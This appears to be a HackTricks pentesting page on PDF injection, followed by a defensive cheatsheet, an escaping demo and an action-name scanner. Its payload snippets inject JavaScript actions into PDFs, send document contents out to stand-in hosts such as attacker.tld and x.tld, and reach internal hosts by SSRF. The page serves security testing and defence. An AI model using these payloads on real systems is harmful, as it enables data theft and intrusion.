PDF Injection

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

If your input is reflected inside a PDF file, you can try to inject PDF data to execute JavaScript, perform SSRF or steal the PDF's contents. PDF syntax is extremely permissive: if you can break out of the string or dictionary that embeds your input, you can append new keys to the same object (or entirely new objects) that Acrobat and Chrome will happily parse. Bug-bounty reports over the last few years have repeatedly shown that a single unescaped parenthesis or backslash is enough for script execution.

TL;DR – Modern Attack Workflow (2024-2026)

  1. Find any user-controlled value that ends up inside a (parenthesis string), a /URI ( … ) or a /JS ( … ) entry of the generated PDF.
  2. Inject ) to close the string, follow it with one of the primitives below, and finish with another opening parenthesis so that the generator's own closing ) is absorbed and the syntax stays valid.
  3. Deliver the malicious PDF to the victim (or to a backend service that renders the file automatically, which is ideal for blind bugs).
  4. Your payload runs in the PDF viewer:
  • Chrome / Edge → PDFium (limited, sandboxed JavaScript API)
  • Firefox → PDF.js (scripting runs inside a sandbox; see CVE-2024-4367 for a rendering bug that still gave script execution)
  • Acrobat → full JavaScript API (can read the document's own text with this.getPageNthWord and send it out)

Example (link annotation hijack). The generator emits /A << /S /URI /URI (https://victim.internal/INPUT) >> and you control INPUT; supply:

) /S /JavaScript /JS (app.alert("PDF pwned")) /Dummy (

The first ) closes the original URI string, so the injected /S /JavaScript and /JS keys land at dictionary level, and /Dummy ( turns the generator's own closing parenthesis into an empty, harmless string. The result is /A << /S /URI /URI (https://victim.internal/) /S /JavaScript /JS (app.alert("PDF pwned")) /Dummy () >>. Acrobat and PDFium both keep the last occurrence of a duplicated key, so the link becomes a JavaScript action that fires when the user clicks it. The parentheses inside the JS string are balanced, which a PDF literal string allows unescaped.
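As an added example (not code from the original page or from any project it mentions), the following Python script builds the one-page PDF with a /Link annotation described above in two ways: once by naively concatenating user input into the /URI string, and once by escaping it according to ISO 32000-1 §7.3.4.2. The hostnames, the payload text and the object layout are constructed for the demonstration; the object numbering and xref table are real enough for a viewer to open the files.

```python
# Added example: PDF string escaping vs. naive concatenation in a link annotation.
# Everything here (hostnames, payload, object layout) is constructed for the demo.


def pdf_literal_string(raw: str) -> bytes:
    """Serialise `raw` as a PDF literal string per ISO 32000-1 §7.3.4.2.
    Backslash and both parentheses are escaped; bytes outside printable
    ASCII become \\ddd octal escapes, so a newline or other delimiter in
    the input can never terminate the string early."""
    out = bytearray(b"(")
    for b in raw.encode("latin-1", "replace"):
        if b in (0x5C, 0x28, 0x29):            # \  (  )
            out += b"\\" + bytes([b])
        elif 0x20 <= b <= 0x7E:
            out.append(b)
        else:
            out += b"\\%03o" % b
    out += b")"
    return bytes(out)


def pdf_hex_string(raw: str) -> bytes:
    """Alternative encoding: a hex string <...> only ever contains hex digits,
    so there is no character an attacker could use to break out of it."""
    return b"<" + raw.encode("latin-1", "replace").hex().upper().encode() + b">"


def build_link_pdf(uri_object: bytes) -> bytes:
    """Minimal one-page PDF with a clickable /Link annotation.
    `uri_object` must already be a serialised PDF string object."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 100] /Annots [4 0 R] >>",
        b"<< /Type /Annot /Subtype /Link /Rect [10 10 190 90] "
        b"/A << /S /URI /URI " + uri_object + b" >> >>",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (
        len(objs) + 1, xref_pos)
    return bytes(out)


# What the generator places into /URI (https://victim.internal/?ref=INPUT) as INPUT:
PAYLOAD = ') /S /JavaScript /JS (app.alert("PDF pwned")) /Dummy ('
BASE_URL = "https://victim.internal/?ref="


def naive_pdf(user_input: str) -> bytes:
    """Vulnerable: the URI string is built by plain concatenation."""
    return build_link_pdf(("(" + BASE_URL + user_input + ")").encode("latin-1", "replace"))


def safe_pdf(user_input: str) -> bytes:
    """Hardened: the same value goes through the §7.3.4.2 escaper."""
    return build_link_pdf(pdf_literal_string(BASE_URL + user_input))


def link_action_dict(pdf: bytes) -> bytes:
    """Return the raw /A << ... >> dictionary of the link, for inspection."""
    start = pdf.index(b"/A <<")
    end = pdf.index(b" >> >>", start)
    return pdf[start:end + 3]


if __name__ == "__main__":
    for label, fn in (("naive", naive_pdf), ("safe", safe_pdf)):
        print(label, link_action_dict(fn(PAYLOAD)).decode("latin-1"))
        # Uncomment to open both files in a viewer and compare behaviour:
        # open(f"{label}.pdf", "wb").write(fn(PAYLOAD))
```

In the naive output the injected /S /JavaScript and /JS keys sit beside the legitimate /S /URI inside the action dictionary; in the hardened output every parenthesis of the payload is prefixed with a backslash and the whole thing remains data inside one string. pdf_hex_string shows the second option from the defensive cheatsheet: a hex string can carry any input because only hex digits ever reach the file.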

Useful injection primitives

Each entry lists the goal, the payload snippet, and notes.

  • JavaScript on open – /OpenAction << /S /JavaScript /JS (app.alert(1)) >> – Runs as soon as the document is opened (works in Acrobat, not in Chrome). Must land in the Catalog dictionary.
  • JavaScript on link – /A << /S /JavaScript /JS (this.submitForm('https://attacker.tld/?c='+this.getPageNumWords(0))) >> – Works in PDFium and Acrobat if you control a /Link annotation. Note that fetch() does not exist in the Acrobat JavaScript API; use this.submitForm or app.launchURL for outbound requests.
  • Blind data exfiltration – << /Type /Action /S /URI /URI (https://attacker.tld/?leak=) >> – A static /URI only beacons that the file was opened; to carry content, build the URL inside JavaScript from this.getPageNthWord and send it with this.submitForm.
  • Server-side SSRF – Same as above but aimed at an internal URL; great when the PDF is rendered by back-office services that follow /URI.
  • Additional Actions (/AA) – /AA << /O << /S /JavaScript /JS (app.alert(1)) >> >> – Attach to a Page dictionary (/O fires when the page is opened); on a widget annotation use /Fo (focus) or /E (mouse enter) instead.
  • Line break for new objects – \nendobj\n10 0 obj\n<< /S /JavaScript /JS (app.alert(1)) >>\nendobj – If the library lets you inject newline characters you can create entirely new objects. The object number must not collide with an existing one, and something (e.g. /OpenAction 10 0 R in the Catalog) has to reference it; viewers rebuild the broken xref table on their own.

Embedded Actions as Injection Targets

PDF readers treat embedded actions such as /OpenAction and /AA (Additional Actions) as first-class features that fire when the document opens or when a specific event occurs. If you can inject into any dictionary that accepts actions (Catalog, Page, Annotation or form field), you can graft an /AA tree onto it and run JavaScript on open/focus.

Example payload for generator-side object injection (close the original string and dictionary, then inject /AA):

) >> /AA << /O << /S /JavaScript /JS (app.alert('AA fired')) >> >> (

This pattern matches the recent jsPDF issue in which attacker-controlled input passed to addJS (or to certain AcroForm fields) escapes the intended JavaScript string and injects an Additional Action dictionary.

Blind enumeration trick

Gareth Heyes (PortSwigger) published a one-liner that enumerates every property of the Doc object of an unknown document, useful when you cannot see the generated PDF:

) /S /JavaScript /JS (for(i in this){try{this.submitForm('https://x.tld/?'+i+'='+this[i])}catch(e){}}) /Dummy (

The code iterates over Acrobat's Doc object (this) and issues an outbound request for every property/value pair, giving you a key/value dump of the document's properties (title, path, page count and so on). The try/catch matters because some getters throw and would otherwise abort the loop. See the white-paper "Portable Data exFiltration: XSS for PDFs" for the full technique.

Real-World Bugs (2023-2026)

  • CVE-2026-25755 – jsPDF addJS PDF object injection: attacker-controlled strings can close the JS literal and inject /AA/O/JavaScript actions that fire on open/focus.
  • CVE-2024-4367 – Arbitrary JavaScript execution in Firefox's PDF.js before 4.2.67 (Firefox 126). The bug was in font rendering (an unchecked FontMatrix value reached generated code), so merely rendering a crafted document ran script in the page; no PDF JavaScript action was needed.
  • Bug bounty 2024-05 – A large fintech allowed customer-supplied invoice notes that ended up in /URI; the report paid $10k after SSRF to an internal metadata host was demonstrated using a file:/// URI.
  • CVE-2023-26155 – node-qpdf command injection via an unsanitised PDF path: the string reached a shell before it reached the PDF layer, a reminder that backslashes and parentheses must be escaped for every layer the input crosses.

Defensive Cheatsheet

  1. Never concatenate raw user input inside () strings or names. Escape \, ( and ) as required by §7.3.4.2 of ISO 32000-1, or use hex strings <...>, which no input character can break out of.
  2. If you build links, fully URL-encode the value you place in /URI (https://…) and reject javascript: and file: schemes before they reach the PDF.
  3. Strip or validate /OpenAction, /AA (additional actions), /Launch, /SubmitForm and /ImportData dictionaries when post-processing PDFs. Names may be written with #xx escapes (/Java#53cript is /JavaScript), so normalise them before matching.
  4. On the server side, do not rely on a structural tool such as qpdf (--decrypt --linearize) to clean a file: it rewrites the PDF but keeps JavaScript and actions intact. Rasterise untrusted PDFs (pdftoppm, Ghostscript) or remove the action keys explicitly, then verify with qpdf --json that no /JS, /JavaScript, /OpenAction or /AA entries remain.
  5. Keep PDF viewers up to date; PDF.js before 4.2.67 (Firefox before 126) is affected by CVE-2024-4367, and Acrobat Reader's security updates should be applied as they ship.
  6. If you use client-side generators (e.g., jsPDF), never pass untrusted input into addJS or AcroForm setters whose values end up inside PDF action dictionaries.
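As an added example (not from the page or from any project it names), here is a Python triage scanner for the third cheatsheet item. It lists action-related names that occur at dictionary level in a PDF, skipping literal strings (so a URL that merely contains "/JS" is not a false positive) and normalising #xx name escapes (so /Java#53cript is reported as /JavaScript). The three sample dictionaries are constructed for the demonstration.

```python
import re
from collections import Counter

# Added example: dictionary-level action-name scanner. Sample inputs are constructed.

# Keys and values that introduce actions (ISO 32000-1 §12.6). /URI is reported too:
# a link is legitimate, but it is also where SSRF payloads land.
ACTION_NAMES = {"OpenAction", "AA", "JS", "JavaScript", "Launch",
                "SubmitForm", "ImportData", "URI"}

# A name runs until whitespace or a delimiter (§7.2.2); '#' is allowed inside it.
NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r /<>\[\]()%{}]*)")
EOL_RE = re.compile(rb"[\r\n]")


def decode_name(token: bytes) -> str:
    """§7.3.5: '#xx' inside a name is a hex-escaped byte, so /Java#53cript is the
    same key as /JavaScript. Normalise before comparing."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), token).decode("latin-1")


def dictionary_level_names(data: bytes) -> list[str]:
    """Every name that appears outside a literal string or comment.
    Literal strings are skipped with §7.3.4.2 rules (backslash escapes,
    balanced nested parentheses), so '/JS' used as string data is ignored."""
    names, i, depth = [], 0, 0
    while i < len(data):
        c = data[i]
        if depth:                                   # inside a literal string
            if c == 0x5C:                           # backslash: skip the escaped byte
                i += 2
                continue
            depth += (c == 0x28) - (c == 0x29)      # nested ( and ) are allowed
            i += 1
            continue
        if c == 0x28:                               # '(' opens a string
            depth = 1
        elif c == 0x25:                             # '%' comment runs to end of line
            m = EOL_RE.search(data, i)
            i = m.start() if m else len(data)
            continue
        elif c == 0x2F:                             # '/' starts a name
            m = NAME_RE.match(data, i)
            names.append(decode_name(m.group(1)))
            i = m.end()
            continue
        i += 1
    return names


def scan(data: bytes) -> dict[str, int]:
    """Count action-related names at dictionary level; an empty dict means none."""
    counts = Counter(dictionary_level_names(data))
    return {n: counts[n] for n in sorted(ACTION_NAMES) if counts[n]}


# Constructed samples: a benign link whose URL merely contains "/JS", an injected
# link from the technique above, and an OpenAction obfuscated with #xx escapes.
CLEAN = (b"<< /Type /Annot /Subtype /Link "
         b"/A << /S /URI /URI (https://example.com/docs/JS/JavaScript%20guide) >> >>")
INJECTED = (b"<< /Type /Annot /Subtype /Link /A << /S /URI /URI (https://victim.internal/) "
            b"/S /JavaScript /JS (app.alert(1)) /Dummy () >> >>")
OBFUSCATED = (b"<< /Type /Catalog /Pages 2 0 R "
              b"/Open#41ction << /S /Java#53cript /J#53 (app.alert\\(1\\)) >> >>")

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("injected", INJECTED), ("obfuscated", OBFUSCATED)):
        print(f"{label:10s} {scan(sample)}")
```

Run it over a whole file with scan(open(path, "rb").read()). Two caveats: dictionaries stored inside compressed object streams are invisible to a byte-level scan, so expand them first (qpdf --qdf --object-streams=disable in.pdf out.pdf), and page content streams also use names, so treat the output as triage rather than a verdict. /URI is counted twice per link because both the action subtype (/S /URI) and the key itself are names.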
